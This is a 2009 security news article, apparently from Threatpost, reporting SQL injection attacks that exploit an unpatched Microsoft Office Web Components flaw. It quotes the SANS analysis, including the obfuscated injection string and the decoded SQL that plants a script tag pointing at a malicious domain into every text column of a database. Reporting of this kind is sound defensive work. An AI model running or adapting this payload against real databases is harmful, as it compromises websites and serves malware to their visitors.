July 16, 2009, 9:22AM
Office Web Components Flaw Used in SQL Injection Attacks
Comment 
Attackers have begun using the unpatched vulnerability in Microsoft's Office Web Components in SQL injection attacks. The vulnerability, which only became public this week, affects millions of users running a number of different versions of Windows, Office and Internet Explorer. The SANS Internet Storm Center said it is receiving reports of SQL injection attacks exploiting the vulnerability and using obfuscated code.
The attacks on the Office Web Components vulnerability don't come as a surprise, and follows the typical arc of these tactics. From the SANS ISC blog:
Editor's Pick
The SQL injection attempt looks very much like the one we've been seeing for month – the attacker blindly tries to inject obfuscated SQL code:
';DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x44004500430…F007200 AS NVARCHAR(4000));
EXEC(@S);
After deobfuscation of the CAST function input, the following SQL code is revealed:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://f1y.in/j.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
As you can see, they are injecting a script code pointing to f1y.in, which is a known bad domain. This script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability.
The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link) – only 15 AV programs detecting it, luckily, some major AV vendors are there.
There is no patch right now for the Office Web Components vulnerability, but Microsoft has released an advisory on the issue, along with instructions on how to implement a workaround. The workaround does not fix the vulnerability, but it prevents the Office Web Components from running in Internet Explorer, which helps prevent attacks against the flaw.
Commenting on this Article is closed.
Today's Most Popular
- Anatomy of a LulzSec Attack 'Singles Out' Web 2.0 Weakness
- Defense Contractor Northrop Grumman Hiring For Offensive Cyber Ops
- OPINION: Are Anonymous Members Forged in the Crucible of IT Compliance?
- Google to Notify Users of DNSChanger Infections Ahead of July 9 Deadline
- Facebook Cancellation Malware Disguised As Adobe Update Making Rounds
Most Commented Stories
-
Forget 'Brogrammers,' Women Have The Edge In DEFCON Social Engineering Contest (9)
-
Defense Contractor Northrop Grumman Hiring For Offensive Cyber Ops (10)
-
The Internet Crime Complaint Center recently warned of malware targeting travelers connecting to Wi-Fi. When traveling, do you (1)
-
HULK DDoS Tool Smash Web Server, Server Fall Down (4)
-
Report: Diablo III Users Find Accounts Hacked, Gold Stolen And New 'Mystery' Friends (2)
Newsletter Sign-up
Take Our Poll
The Internet Crime Complaint Center recently warned of malware targeting travelers connecting to Wi-Fi. When traveling, do you
Connect to anything
20%
Only connect to password-protected, secure connections
38%
Only use websites with HTTPS
28%
I don’t pay attention to how I access the internet while traveling
14%
Total votes: 65
Follow Threatpost
 |  |  |  |
| Tumblr |
